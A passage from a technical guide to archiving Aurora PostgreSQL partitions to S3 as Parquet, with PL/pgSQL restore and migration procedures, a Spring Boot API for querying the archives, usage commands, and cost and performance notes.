                WHERE s.ctid IN (SELECT ctid FROM to_migrate)
                RETURNING 1
            )
            SELECT COUNT(*) FROM inserted
        $sql$,
            p_staging_schema, p_staging_table,
            p_target_schema, p_target_table, p_partition_column,
            p_target_schema, p_target_table, v_columns,
            v_columns,
            p_staging_schema, p_staging_table
        ) INTO v_batch_migrated USING p_partition_value, p_batch_size;

        v_total_migrated := v_total_migrated + v_batch_migrated;

        IF v_batch_migrated = 0 THEN
            EXIT;
        END IF;

        RAISE NOTICE 'Migrated batch: % records (total: %)', v_batch_migrated, v_total_migrated;
        COMMIT;
    END LOOP;

    RAISE NOTICE 'Migration complete. Total records migrated: %', v_total_migrated;
END;
$$;

-- Usage
CALL migrate_partition_data(
    'public', 'transactions_staging',
    'public', 'transactions',
    'transaction_date', '2024-01',
    TRUE,   -- delete existing
    50000   -- batch size
);

5.4 Attach Partition (for Partitioned Tables)

-- For natively partitioned tables, attach the staging table as a partition

CREATE OR REPLACE PROCEDURE attach_restored_partition(
    p_staging_schema TEXT,
    p_staging_table TEXT,
    p_target_schema TEXT,
    p_target_table TEXT,
    p_partition_column TEXT,
    p_partition_start TEXT,
    p_partition_end TEXT
)
LANGUAGE plpgsql
AS $$
DECLARE
    v_partition_name TEXT;
    v_constraint_name TEXT;
BEGIN
    -- Validate schemas match
    IF NOT (
        SELECT bool_and(is_valid)
        FROM validate_table_schemas(
            p_staging_schema, p_staging_table,
            p_target_schema, p_target_table
        )
    ) THEN
        RAISE EXCEPTION 'Schema validation failed';
    END IF;

    -- Add constraint to staging table that matches partition bounds
    v_constraint_name := p_staging_table || '_partition_check';

    EXECUTE format($sql$
        ALTER TABLE %I.%I 
        ADD CONSTRAINT %I 
        CHECK (%I >= %L AND %I < %L)
    $sql$,
        p_staging_schema, p_staging_table,
        v_constraint_name,
        p_partition_column, p_partition_start,
        p_partition_column, p_partition_end
    );

    -- Validate constraint without locking
    EXECUTE format($sql$
        ALTER TABLE %I.%I 
        VALIDATE CONSTRAINT %I
    $sql$,
        p_staging_schema, p_staging_table,
        v_constraint_name
    );

    -- Detach old partition if exists
    v_partition_name := p_target_table || '_' || replace(p_partition_start, '-', '_');

    BEGIN
        EXECUTE format($sql$
            ALTER TABLE %I.%I 
            DETACH PARTITION %I.%I
        $sql$,
            p_target_schema, p_target_table,
            p_target_schema, v_partition_name
        );
        RAISE NOTICE 'Detached existing partition %', v_partition_name;
    EXCEPTION WHEN undefined_table THEN
        RAISE NOTICE 'No existing partition to detach';
    END;

    -- Rename staging table to partition name
    EXECUTE format($sql$
        ALTER TABLE %I.%I RENAME TO %I
    $sql$,
        p_staging_schema, p_staging_table,
        v_partition_name
    );

    -- Attach as partition
    EXECUTE format($sql$
        ALTER TABLE %I.%I 
        ATTACH PARTITION %I.%I 
        FOR VALUES FROM (%L) TO (%L)
    $sql$,
        p_target_schema, p_target_table,
        p_staging_schema, v_partition_name,
        p_partition_start, p_partition_end
    );

    RAISE NOTICE 'Successfully attached partition % to %', 
        v_partition_name, p_target_table;
END;
$$;

-- Usage for range partitioned table
CALL attach_restored_partition(
    'public', 'transactions_staging',
    'public', 'transactions',
    'transaction_date',
    '2024-01-01', '2024-02-01'
);

5.5 Cleanup Script

-- Clean up after successful migration

CREATE OR REPLACE PROCEDURE cleanup_after_migration(
    p_staging_schema TEXT,
    p_staging_table TEXT,
    p_verify_target_schema TEXT DEFAULT NULL,
    p_verify_target_table TEXT DEFAULT NULL,
    p_verify_count BOOLEAN DEFAULT TRUE
)
LANGUAGE plpgsql
AS $$
DECLARE
    v_staging_count BIGINT;
    v_target_count BIGINT;
BEGIN
    IF p_verify_count AND p_verify_target_schema IS NOT NULL THEN
        EXECUTE format(
            'SELECT COUNT(*) FROM %I.%I',
            p_staging_schema, p_staging_table
        ) INTO v_staging_count;

        EXECUTE format(
            'SELECT COUNT(*) FROM %I.%I',
            p_verify_target_schema, p_verify_target_table
        ) INTO v_target_count;

        IF v_target_count < v_staging_count THEN
            RAISE WARNING 'Target count (%) is less than staging count (%). Migration may be incomplete.',
                v_target_count, v_staging_count;
            RETURN;
        END IF;
    END IF;

    EXECUTE format(
        'DROP TABLE IF EXISTS %I.%I',
        p_staging_schema, p_staging_table
    );

    RAISE NOTICE 'Dropped staging table %.%', p_staging_schema, p_staging_table;
END;
$$;

-- Usage
CALL cleanup_after_migration(
    'public', 'transactions_staging',
    'public', 'transactions',
    TRUE
);

6. Spring Boot Query API

This API allows querying archived data directly from S3 without restoring to the database.

6.1 Project Structure

src/main/java/com/example/archivequery/
    ArchiveQueryApplication.java
    config/
        AwsConfig.java
        ParquetConfig.java
    controller/
        ArchiveQueryController.java
    service/
        ParquetQueryService.java
        PredicateParser.java
    model/
        QueryRequest.java
        QueryResponse.java
        ArchiveMetadata.java
    predicate/
        Predicate.java
        ComparisonPredicate.java
        LogicalPredicate.java
        PredicateEvaluator.java

6.2 Application Configuration

// ArchiveQueryApplication.java
package com.example.archivequery;

import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;

@SpringBootApplication
public class ArchiveQueryApplication {
    public static void main(String[] args) {
        SpringApplication.run(ArchiveQueryApplication.class, args);
    }
}

6.3 AWS Configuration

// config/AwsConfig.java
package com.example.archivequery.config;

import org.springframework.beans.factory.annotation.Value;
import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import software.amazon.awssdk.auth.credentials.DefaultCredentialsProvider;
import software.amazon.awssdk.regions.Region;
import software.amazon.awssdk.services.s3.S3Client;

@Configuration
public class AwsConfig {

    @Value("${aws.region:eu-west-1}")
    private String region;

    @Bean
    public S3Client s3Client() {
        return S3Client.builder()
            .region(Region.of(region))
            .credentialsProvider(DefaultCredentialsProvider.create())
            .build();
    }
}

6.4 Parquet Configuration

// config/ParquetConfig.java
package com.example.archivequery.config;

import org.apache.hadoop.conf.Configuration;
import org.springframework.beans.factory.annotation.Value;
import org.springframework.context.annotation.Bean;

@org.springframework.context.annotation.Configuration
public class ParquetConfig {

    @Value("${aws.region:eu-west-1}")
    private String region;

    @Bean
    public Configuration hadoopConfiguration() {
        Configuration conf = new Configuration();
        conf.set("fs.s3a.impl", "org.apache.hadoop.fs.s3a.S3AFileSystem");
        conf.set("fs.s3a.aws.credentials.provider", 
            "com.amazonaws.auth.DefaultAWSCredentialsProviderChain");
        conf.set("fs.s3a.endpoint.region", region);
        return conf;
    }
}

6.5 Model Classes

// model/QueryRequest.java
package com.example.archivequery.model;

import java.util.List;
import java.util.Map;

public record QueryRequest(
    String archivePath,
    List<String> columns,
    Map<String, Object> filters,
    String filterExpression,
    Integer limit,
    Integer offset
) {
    public QueryRequest {
        if (limit == null) limit = 1000;
        if (offset == null) offset = 0;
    }
}
// model/QueryResponse.java
package com.example.archivequery.model;

import java.util.List;
import java.util.Map;

public record QueryResponse(
    List<Map<String, Object>> data,
    long totalMatched,
    long totalScanned,
    long executionTimeMs,
    Map<String, String> schema,
    String archivePath
) {}
// model/ArchiveMetadata.java
package com.example.archivequery.model;

import java.time.Instant;
import java.util.List;
import java.util.Map;

public record ArchiveMetadata(
    String tableUuid,
    String location,
    List<ColumnDefinition> columns,
    Map<String, String> properties,
    Instant archivedAt
) {
    public record ColumnDefinition(
        int id,
        String name,
        String type,
        boolean required
    ) {}
}

6.6 Predicate Classes

// predicate/Predicate.java
package com.example.archivequery.predicate;

import java.util.Map;

public sealed interface Predicate 
    permits ComparisonPredicate, LogicalPredicate {

    boolean evaluate(Map<String, Object> record);
}
// predicate/ComparisonPredicate.java
package com.example.archivequery.predicate;

import java.math.BigDecimal;
import java.time.LocalDate;
import java.time.LocalDateTime;
import java.util.Map;
import java.util.Objects;

public record ComparisonPredicate(
    String column,
    Operator operator,
    Object value
) implements Predicate {

    public enum Operator {
        EQ, NE, GT, GE, LT, LE, LIKE, IN, IS_NULL, IS_NOT_NULL
    }

    @Override
    public boolean evaluate(Map<String, Object> record) {
        Object recordValue = record.get(column);

        return switch (operator) {
            case IS_NULL -> recordValue == null;
            case IS_NOT_NULL -> recordValue != null;
            case EQ -> Objects.equals(recordValue, convertValue(recordValue));
            case NE -> !Objects.equals(recordValue, convertValue(recordValue));
            case GT -> compare(recordValue, convertValue(recordValue)) > 0;
            case GE -> compare(recordValue, convertValue(recordValue)) >= 0;
            case LT -> compare(recordValue, convertValue(recordValue)) < 0;
            case LE -> compare(recordValue, convertValue(recordValue)) <= 0;
            case LIKE -> matchesLike(recordValue);
            case IN -> matchesIn(recordValue);
        };
    }

    private Object convertValue(Object recordValue) {
        if (recordValue == null || value == null) return value;

        if (recordValue instanceof LocalDate && value instanceof String s) {
            return LocalDate.parse(s);
        }
        if (recordValue instanceof LocalDateTime && value instanceof String s) {
            return LocalDateTime.parse(s);
        }
        if (recordValue instanceof BigDecimal && value instanceof Number n) {
            return new BigDecimal(n.toString());
        }
        if (recordValue instanceof Long && value instanceof Number n) {
            return n.longValue();
        }
        if (recordValue instanceof Integer && value instanceof Number n) {
            return n.intValue();
        }
        if (recordValue instanceof Double && value instanceof Number n) {
            return n.doubleValue();
        }

        return value;
    }

    @SuppressWarnings({"unchecked", "rawtypes"})
    private int compare(Object a, Object b) {
        if (a == null || b == null) return 0;
        if (a instanceof Comparable ca && b instanceof Comparable cb) {
            return ca.compareTo(cb);
        }
        return 0;
    }

    private boolean matchesLike(Object recordValue) {
        if (recordValue == null || value == null) return false;
        String pattern = value.toString()
            .replace("%", ".*")
            .replace("_", ".");
        return recordValue.toString().matches(pattern);
    }

    private boolean matchesIn(Object recordValue) {
        if (recordValue == null || value == null) return false;
        if (value instanceof Iterable<?> iterable) {
            for (Object item : iterable) {
                if (Objects.equals(recordValue, item)) return true;
            }
        }
        return false;
    }
}
// predicate/LogicalPredicate.java
package com.example.archivequery.predicate;

import java.util.List;
import java.util.Map;

public record LogicalPredicate(
    Operator operator,
    List<Predicate> predicates
) implements Predicate {

    public enum Operator {
        AND, OR, NOT
    }

    @Override
    public boolean evaluate(Map<String, Object> record) {
        return switch (operator) {
            case AND -> predicates.stream().allMatch(p -> p.evaluate(record));
            case OR -> predicates.stream().anyMatch(p -> p.evaluate(record));
            case NOT -> !predicates.getFirst().evaluate(record);
        };
    }
}
// predicate/PredicateEvaluator.java
package com.example.archivequery.predicate;

import java.util.Map;

public class PredicateEvaluator {

    private final Predicate predicate;

    public PredicateEvaluator(Predicate predicate) {
        this.predicate = predicate;
    }

    public boolean matches(Map<String, Object> record) {
        if (predicate == null) return true;
        return predicate.evaluate(record);
    }
}

6.7 Predicate Parser

// service/PredicateParser.java
package com.example.archivequery.service;

import com.example.archivequery.predicate.*;
import org.springframework.stereotype.Service;

import java.util.*;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

@Service
public class PredicateParser {

    private static final Pattern COMPARISON_PATTERN = Pattern.compile(
        "(\\w+)\\s*(=|!=|<>|>=|<=|>|<|LIKE|IN|IS NULL|IS NOT NULL)\\s*(.*)?"
    );

    public Predicate parse(String expression) {
        if (expression == null || expression.isBlank()) {
            return null;
        }
        return parseExpression(expression.trim());
    }

    public Predicate fromFilters(Map<String, Object> filters) {
        if (filters == null || filters.isEmpty()) {
            return null;
        }

        List<Predicate> predicates = new ArrayList<>();

        for (Map.Entry<String, Object> entry : filters.entrySet()) {
            String key = entry.getKey();
            Object value = entry.getValue();

            if (key.endsWith("_gt")) {
                predicates.add(new ComparisonPredicate(
                    key.substring(0, key.length() - 3),
                    ComparisonPredicate.Operator.GT,
                    value
                ));
            } else if (key.endsWith("_gte")) {
                predicates.add(new ComparisonPredicate(
                    key.substring(0, key.length() - 4),
                    ComparisonPredicate.Operator.GE,
                    value
                ));
            } else if (key.endsWith("_lt")) {
                predicates.add(new ComparisonPredicate(
                    key.substring(0, key.length() - 3),
                    ComparisonPredicate.Operator.LT,
                    value
                ));
            } else if (key.endsWith("_lte")) {
                predicates.add(new ComparisonPredicate(
                    key.substring(0, key.length() - 4),
                    ComparisonPredicate.Operator.LE,
                    value
                ));
            } else if (key.endsWith("_ne")) {
                predicates.add(new ComparisonPredicate(
                    key.substring(0, key.length() - 3),
                    ComparisonPredicate.Operator.NE,
                    value
                ));
            } else if (key.endsWith("_like")) {
                predicates.add(new ComparisonPredicate(
                    key.substring(0, key.length() - 5),
                    ComparisonPredicate.Operator.LIKE,
                    value
                ));
            } else if (key.endsWith("_in") && value instanceof List<?> list) {
                predicates.add(new ComparisonPredicate(
                    key.substring(0, key.length() - 3),
                    ComparisonPredicate.Operator.IN,
                    list
                ));
            } else {
                predicates.add(new ComparisonPredicate(
                    key,
                    ComparisonPredicate.Operator.EQ,
                    value
                ));
            }
        }

        if (predicates.size() == 1) {
            return predicates.getFirst();
        }

        return new LogicalPredicate(LogicalPredicate.Operator.AND, predicates);
    }

    private Predicate parseExpression(String expression) {
        String upper = expression.toUpperCase();

        int andIndex = findLogicalOperator(upper, " AND ");
        if (andIndex > 0) {
            String left = expression.substring(0, andIndex);
            String right = expression.substring(andIndex + 5);
            return new LogicalPredicate(
                LogicalPredicate.Operator.AND,
                List.of(parseExpression(left), parseExpression(right))
            );
        }

        int orIndex = findLogicalOperator(upper, " OR ");
        if (orIndex > 0) {
            String left = expression.substring(0, orIndex);
            String right = expression.substring(orIndex + 4);
            return new LogicalPredicate(
                LogicalPredicate.Operator.OR,
                List.of(parseExpression(left), parseExpression(right))
            );
        }

        if (upper.startsWith("NOT ")) {
            return new LogicalPredicate(
                LogicalPredicate.Operator.NOT,
                List.of(parseExpression(expression.substring(4)))
            );
        }

        if (expression.startsWith("(") && expression.endsWith(")")) {
            return parseExpression(expression.substring(1, expression.length() - 1));
        }

        return parseComparison(expression);
    }

    private int findLogicalOperator(String expression, String operator) {
        int depth = 0;
        int index = 0;

        while (index < expression.length()) {
            char c = expression.charAt(index);
            if (c == '(') depth++;
            else if (c == ')') depth--;
            else if (depth == 0 && expression.substring(index).startsWith(operator)) {
                return index;
            }
            index++;
        }
        return -1;
    }

    private Predicate parseComparison(String expression) {
        Matcher matcher = COMPARISON_PATTERN.matcher(expression.trim());

        if (!matcher.matches()) {
            throw new IllegalArgumentException("Invalid expression: " + expression);
        }

        String column = matcher.group(1);
        String operatorStr = matcher.group(2).toUpperCase();
        String valueStr = matcher.group(3);

        ComparisonPredicate.Operator operator = switch (operatorStr) {
            case "=" -> ComparisonPredicate.Operator.EQ;
            case "!=", "<>" -> ComparisonPredicate.Operator.NE;
            case ">" -> ComparisonPredicate.Operator.GT;
            case ">=" -> ComparisonPredicate.Operator.GE;
            case "<" -> ComparisonPredicate.Operator.LT;
            case "<=" -> ComparisonPredicate.Operator.LE;
            case "LIKE" -> ComparisonPredicate.Operator.LIKE;
            case "IN" -> ComparisonPredicate.Operator.IN;
            case "IS NULL" -> ComparisonPredicate.Operator.IS_NULL;
            case "IS NOT NULL" -> ComparisonPredicate.Operator.IS_NOT_NULL;
            default -> throw new IllegalArgumentException("Unknown operator: " + operatorStr);
        };

        Object value = parseValue(valueStr, operator);

        return new ComparisonPredicate(column, operator, value);
    }

    private Object parseValue(String valueStr, ComparisonPredicate.Operator operator) {
        if (operator == ComparisonPredicate.Operator.IS_NULL || 
            operator == ComparisonPredicate.Operator.IS_NOT_NULL) {
            return null;
        }

        if (valueStr == null || valueStr.isBlank()) {
            return null;
        }

        valueStr = valueStr.trim();

        if (valueStr.startsWith("'") && valueStr.endsWith("'")) {
            return valueStr.substring(1, valueStr.length() - 1);
        }

        if (operator == ComparisonPredicate.Operator.IN) {
            if (valueStr.startsWith("(") && valueStr.endsWith(")")) {
                valueStr = valueStr.substring(1, valueStr.length() - 1);
            }
            return Arrays.stream(valueStr.split(","))
                .map(String::trim)
                .map(s -> s.startsWith("'") ? s.substring(1, s.length() - 1) : parseNumber(s))
                .toList();
        }

        return parseNumber(valueStr);
    }

    private Object parseNumber(String s) {
        try {
            if (s.contains(".")) {
                return Double.parseDouble(s);
            }
            return Long.parseLong(s);
        } catch (NumberFormatException e) {
            return s;
        }
    }
}

6.8 Parquet Query Service

// service/ParquetQueryService.java
package com.example.archivequery.service;

import com.example.archivequery.model.*;
import com.example.archivequery.predicate.*;
import com.fasterxml.jackson.databind.ObjectMapper;
import org.apache.hadoop.conf.Configuration;
import org.apache.hadoop.fs.Path;
import org.apache.parquet.avro.AvroParquetReader;
import org.apache.parquet.hadoop.ParquetReader;
import org.apache.parquet.hadoop.util.HadoopInputFile;
import org.apache.avro.generic.GenericRecord;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.stereotype.Service;
import software.amazon.awssdk.services.s3.S3Client;
import software.amazon.awssdk.services.s3.model.*;

import java.io.IOException;
import java.net.URI;
import java.time.*;
import java.util.*;
import java.util.concurrent.*;
import java.util.stream.Collectors;

@Service
public class ParquetQueryService {

    private static final Logger log = LoggerFactory.getLogger(ParquetQueryService.class);

    private final S3Client s3Client;
    private final Configuration hadoopConfig;
    private final PredicateParser predicateParser;
    private final ObjectMapper objectMapper;
    private final ExecutorService executorService;

    public ParquetQueryService(
        S3Client s3Client,
        Configuration hadoopConfig,
        PredicateParser predicateParser
    ) {
        this.s3Client = s3Client;
        this.hadoopConfig = hadoopConfig;
        this.predicateParser = predicateParser;
        this.objectMapper = new ObjectMapper();
        this.executorService = Executors.newFixedThreadPool(
            Runtime.getRuntime().availableProcessors()
        );
    }

    public QueryResponse query(QueryRequest request) {
        long startTime = System.currentTimeMillis();

        Predicate predicate = buildPredicate(request);
        PredicateEvaluator evaluator = new PredicateEvaluator(predicate);

        List<String> dataFiles = listDataFiles(request.archivePath());

        List<Map<String, Object>> allResults = Collections.synchronizedList(new ArrayList<>());
        long[] counters = new long[2];

        List<Future<?>> futures = new ArrayList<>();

        for (String dataFile : dataFiles) {
            futures.add(executorService.submit(() -> {
                try {
                    QueryFileResult result = queryFile(
                        dataFile, 
                        request.columns(), 
                        evaluator
                    );
                    synchronized (counters) {
                        counters[0] += result.matched();
                        counters[1] += result.scanned();
                    }
                    allResults.addAll(result.records());
                } catch (IOException e) {
                    log.error("Error reading file: " + dataFile, e);
                }
            }));
        }

        for (Future<?> future : futures) {
            try {
                future.get();
            } catch (InterruptedException | ExecutionException e) {
                log.error("Error waiting for query completion", e);
            }
        }

        List<Map<String, Object>> paginatedResults = allResults.stream()
            .skip(request.offset())
            .limit(request.limit())
            .collect(Collectors.toList());

        Map<String, String> schema = extractSchema(request.archivePath());

        long executionTime = System.currentTimeMillis() - startTime;

        return new QueryResponse(
            paginatedResults,
            counters[0],
            counters[1],
            executionTime,
            schema,
            request.archivePath()
        );
    }

    public ArchiveMetadata getMetadata(String archivePath) {
        try {
            URI uri = URI.create(archivePath);
            String bucket = uri.getHost();
            String prefix = uri.getPath().substring(1);

            GetObjectRequest getRequest = GetObjectRequest.builder()
                .bucket(bucket)
                .key(prefix + "/metadata/v1.metadata.json")
                .build();

            byte[] content = s3Client.getObjectAsBytes(getRequest).asByteArray();
            Map<String, Object> metadata = objectMapper.readValue(content, Map.class);

            List<Map<String, Object>> schemas = (List<Map<String, Object>>) metadata.get("schemas");
            Map<String, Object> currentSchema = schemas.getFirst();
            List<Map<String, Object>> fields = (List<Map<String, Object>>) currentSchema.get("fields");

            List<ArchiveMetadata.ColumnDefinition> columns = fields.stream()
                .map(f -> new ArchiveMetadata.ColumnDefinition(
                    ((Number) f.get("id")).intValue(),
                    (String) f.get("name"),
                    (String) f.get("type"),
                    (Boolean) f.get("required")
                ))
                .toList();

            Map<String, String> properties = (Map<String, String>) metadata.get("properties");

            String archivedAtStr = properties.get("archive.timestamp");
            Instant archivedAt = archivedAtStr != null ? 
                Instant.parse(archivedAtStr) : Instant.now();

            return new ArchiveMetadata(
                (String) metadata.get("table_uuid"),
                (String) metadata.get("location"),
                columns,
                properties,
                archivedAt
            );
        } catch (Exception e) {
            throw new RuntimeException("Failed to read archive metadata", e);
        }
    }

    private Predicate buildPredicate(QueryRequest request) {
        Predicate filterPredicate = predicateParser.fromFilters(request.filters());
        Predicate expressionPredicate = predicateParser.parse(request.filterExpression());

        if (filterPredicate == null) return expressionPredicate;
        if (expressionPredicate == null) return filterPredicate;

        return new LogicalPredicate(
            LogicalPredicate.Operator.AND,
            List.of(filterPredicate, expressionPredicate)
        );
    }

    private List<String> listDataFiles(String archivePath) {
        URI uri = URI.create(archivePath);
        String bucket = uri.getHost();
        String prefix = uri.getPath().substring(1) + "/data/";

        ListObjectsV2Request listRequest = ListObjectsV2Request.builder()
            .bucket(bucket)
            .prefix(prefix)
            .build();

        List<String> files = new ArrayList<>();
        ListObjectsV2Response response;

        do {
            response = s3Client.listObjectsV2(listRequest);

            for (S3Object obj : response.contents()) {
                if (obj.key().endsWith(".parquet")) {
                    files.add("s3a://" + bucket + "/" + obj.key());
                }
            }

            listRequest = listRequest.toBuilder()
                .continuationToken(response.nextContinuationToken())
                .build();

        } while (response.isTruncated());

        return files;
    }

    private record QueryFileResult(
        List<Map<String, Object>> records,
        long matched,
        long scanned
    ) {}

    private QueryFileResult queryFile(
        String filePath,
        List<String> columns,
        PredicateEvaluator evaluator
    ) throws IOException {
        List<Map<String, Object>> results = new ArrayList<>();
        long matched = 0;
        long scanned = 0;

        Path path = new Path(filePath);
        HadoopInputFile inputFile = HadoopInputFile.fromPath(path, hadoopConfig);

        try (ParquetReader<GenericRecord> reader = AvroParquetReader
                .<GenericRecord>builder(inputFile)
                .withConf(hadoopConfig)
                .build()) {

            GenericRecord record;
            while ((record = reader.read()) != null) {
                scanned++;
                Map<String, Object> recordMap = recordToMap(record);

                if (evaluator.matches(recordMap)) {
                    matched++;

                    if (columns != null && !columns.isEmpty()) {
                        Map<String, Object> projected = new LinkedHashMap<>();
                        for (String col : columns) {
                            if (recordMap.containsKey(col)) {
                                projected.put(col, recordMap.get(col));
                            }
                        }
                        results.add(projected);
                    } else {
                        results.add(recordMap);
                    }
                }
            }
        }

        return new QueryFileResult(results, matched, scanned);
    }

    private Map<String, Object> recordToMap(GenericRecord record) {
        Map<String, Object> map = new LinkedHashMap<>();

        for (org.apache.avro.Schema.Field field : record.getSchema().getFields()) {
            String name = field.name();
            Object value = record.get(name);
            map.put(name, convertValue(value));
        }

        return map;
    }

    private Object convertValue(Object value) {
        if (value == null) return null;

        if (value instanceof org.apache.avro.util.Utf8) {
            return value.toString();
        }

        if (value instanceof org.apache.avro.generic.GenericRecord nested) {
            return recordToMap(nested);
        }

        if (value instanceof java.nio.ByteBuffer buffer) {
            byte[] bytes = new byte[buffer.remaining()];
            buffer.get(bytes);
            return Base64.getEncoder().encodeToString(bytes);
        }

        if (value instanceof Integer i) {
            return LocalDate.ofEpochDay(i);
        }

        if (value instanceof Long l && l > 1_000_000_000_000L) {
            return LocalDateTime.ofInstant(
                Instant.ofEpochMilli(l / 1000), 
                ZoneOffset.UTC
            );
        }

        return value;
    }

    private Map<String, String> extractSchema(String archivePath) {
        try {
            ArchiveMetadata metadata = getMetadata(archivePath);
            return metadata.columns().stream()
                .collect(Collectors.toMap(
                    ArchiveMetadata.ColumnDefinition::name,
                    ArchiveMetadata.ColumnDefinition::type,
                    (a, b) -> a,
                    LinkedHashMap::new
                ));
        } catch (Exception e) {
            log.warn("Failed to extract schema", e);
            return Collections.emptyMap();
        }
    }
}

6.9 REST Controller

// controller/ArchiveQueryController.java
package com.example.archivequery.controller;

import com.example.archivequery.model.*;
import com.example.archivequery.service.ParquetQueryService;
import org.springframework.http.ResponseEntity;
import org.springframework.web.bind.annotation.*;

import java.util.List;
import java.util.Map;

@RestController
@RequestMapping("/api/v1/archives")
public class ArchiveQueryController {

    private final ParquetQueryService queryService;

    public ArchiveQueryController(ParquetQueryService queryService) {
        this.queryService = queryService;
    }

    @PostMapping("/query")
    public ResponseEntity<QueryResponse> query(@RequestBody QueryRequest request) {
        QueryResponse response = queryService.query(request);
        return ResponseEntity.ok(response);
    }

    @GetMapping("/query")
    public ResponseEntity<QueryResponse> queryGet(
        @RequestParam String archivePath,
        @RequestParam(required = false) List<String> columns,
        @RequestParam(required = false) String filter,
        @RequestParam(defaultValue = "1000") Integer limit,
        @RequestParam(defaultValue = "0") Integer offset
    ) {
        QueryRequest request = new QueryRequest(
            archivePath,
            columns,
            null,
            filter,
            limit,
            offset
        );

        QueryResponse response = queryService.query(request);
        return ResponseEntity.ok(response);
    }

    @GetMapping("/metadata")
    public ResponseEntity<ArchiveMetadata> getMetadata(
        @RequestParam String archivePath
    ) {
        ArchiveMetadata metadata = queryService.getMetadata(archivePath);
        return ResponseEntity.ok(metadata);
    }

    @GetMapping("/schema/{schema}/{table}/{partitionValue}")
    public ResponseEntity<ArchiveMetadata> getMetadataByTable(
        @PathVariable String schema,
        @PathVariable String table,
        @PathVariable String partitionValue,
        @RequestParam String bucket,
        @RequestParam(defaultValue = "aurora-archives") String prefix
    ) {
        String archivePath = String.format(
            "s3://%s/%s/%s/%s/%s",
            bucket, prefix, schema, table, partitionValue
        );

        ArchiveMetadata metadata = queryService.getMetadata(archivePath);
        return ResponseEntity.ok(metadata);
    }

    @PostMapping("/query/{schema}/{table}/{partitionValue}")
    public ResponseEntity<QueryResponse> queryByTable(
        @PathVariable String schema,
        @PathVariable String table,
        @PathVariable String partitionValue,
        @RequestParam String bucket,
        @RequestParam(defaultValue = "aurora-archives") String prefix,
        @RequestBody Map<String, Object> requestBody
    ) {
        String archivePath = String.format(
            "s3://%s/%s/%s/%s/%s",
            bucket, prefix, schema, table, partitionValue
        );

        List<String> columns = requestBody.containsKey("columns") ?
            (List<String>) requestBody.get("columns") : null;

        Map<String, Object> filters = requestBody.containsKey("filters") ?
            (Map<String, Object>) requestBody.get("filters") : null;

        String filterExpression = requestBody.containsKey("filterExpression") ?
            (String) requestBody.get("filterExpression") : null;

        Integer limit = requestBody.containsKey("limit") ?
            ((Number) requestBody.get("limit")).intValue() : 1000;

        Integer offset = requestBody.containsKey("offset") ?
            ((Number) requestBody.get("offset")).intValue() : 0;

        QueryRequest request = new QueryRequest(
            archivePath,
            columns,
            filters,
            filterExpression,
            limit,
            offset
        );

        QueryResponse response = queryService.query(request);
        return ResponseEntity.ok(response);
    }
}

6.10 Application Properties

# application.yml
server:
  port: 8080

aws:
  region: ${AWS_REGION:eu-west-1}

spring:
  application:
    name: archive-query-service

logging:
  level:
    com.example.archivequery: DEBUG
    org.apache.parquet: WARN
    org.apache.hadoop: WARN

7. Usage Examples

7.1 Archive a Partition

# Set environment variables
export AURORA_HOST=your-cluster.cluster-xxxx.eu-west-1.rds.amazonaws.com
export AURORA_DATABASE=production
export AURORA_USER=admin
export AURORA_PASSWORD=your-password
export ARCHIVE_S3_BUCKET=my-archive-bucket
export ARCHIVE_S3_PREFIX=aurora-archives
export AWS_REGION=eu-west-1

# Archive January 2024 transactions
python archive_partition.py \
    --table transactions \
    --partition-column transaction_month \
    --partition-value 2024-01 \
    --schema public \
    --batch-size 100000

7.2 Query Archived Data via API

# Get archive metadata
curl -X GET "http://localhost:8080/api/v1/archives/metadata?archivePath=s3://my-archive-bucket/aurora-archives/public/transactions/transaction_month=2024-01"

# Query with filters (POST)
curl -X POST "http://localhost:8080/api/v1/archives/query" \
    -H "Content-Type: application/json" \
    -d '{
        "archivePath": "s3://my-archive-bucket/aurora-archives/public/transactions/transaction_month=2024-01",
        "columns": ["transaction_id", "customer_id", "amount", "transaction_date"],
        "filters": {
            "amount_gte": 1000,
            "status": "completed"
        },
        "limit": 100,
        "offset": 0
    }'

# Query with expression filter (GET)
curl -X GET "http://localhost:8080/api/v1/archives/query" \
    --data-urlencode "archivePath=s3://my-archive-bucket/aurora-archives/public/transactions/transaction_month=2024-01" \
    --data-urlencode "filter=amount >= 1000 AND status = 'completed'" \
    --data-urlencode "columns=transaction_id,customer_id,amount" \
    --data-urlencode "limit=50"

7.3 Restore Archived Data

# Restore to staging table
python restore_partition.py \
    --source-path s3://my-archive-bucket/aurora-archives/public/transactions/transaction_month=2024-01 \
    --target-table transactions_staging \
    --target-schema public \
    --batch-size 10000

7.4 Migrate to Main Table

-- Validate before migration
SELECT * FROM generate_migration_report(
    'public', 'transactions_staging',
    'public', 'transactions',
    'transaction_month', '2024-01'
);

-- Migrate data
CALL migrate_partition_data(
    'public', 'transactions_staging',
    'public', 'transactions',
    'transaction_month', '2024-01',
    TRUE,    -- delete existing data in partition
    50000    -- batch size
);

-- Clean up staging table
CALL cleanup_after_migration(
    'public', 'transactions_staging',
    'public', 'transactions',
    TRUE     -- verify counts
);

8. Operational Considerations

8.1 Cost Analysis

The cost savings from this approach are significant:

Storage TypeMonthly Cost per TB
Aurora PostgreSQL$230
S3 Standard$23
S3 Intelligent Tiering$23 (hot) to $4 (archive)
S3 Glacier Instant Retrieval$4

For a 10TB historical dataset:

  • Aurora: $2,300/month
  • S3 with Parquet (7:1 compression): ~$33/month
  • Savings: ~98.5%

8.2 Query Performance

The Spring Boot API performance depends on:

  1. Data file size: Smaller files (100MB to 250MB) enable better parallelism
  2. Predicate selectivity: Higher selectivity means fewer records to deserialise
  3. Column projection: Requesting fewer columns reduces I/O
  4. S3 latency: Use same region as the bucket

Expected performance for a 1TB partition (compressed to ~150GB Parquet):

Query TypeTypical Latency
Point lookup (indexed column)500ms to 2s
Range scan (10% selectivity)5s to 15s
Full scan with aggregation30s to 60s

8.3 Monitoring and Alerting

Implement these CloudWatch metrics for production use:

@Component
public class QueryMetrics {

    private final MeterRegistry meterRegistry;

    public void recordQuery(QueryResponse response) {
        meterRegistry.counter("archive.query.count").increment();

        meterRegistry.timer("archive.query.duration")
            .record(response.executionTimeMs(), TimeUnit.MILLISECONDS);

        meterRegistry.gauge("archive.query.records_scanned", response.totalScanned());
        meterRegistry.gauge("archive.query.records_matched", response.totalMatched());
    }
}

9. Conclusion

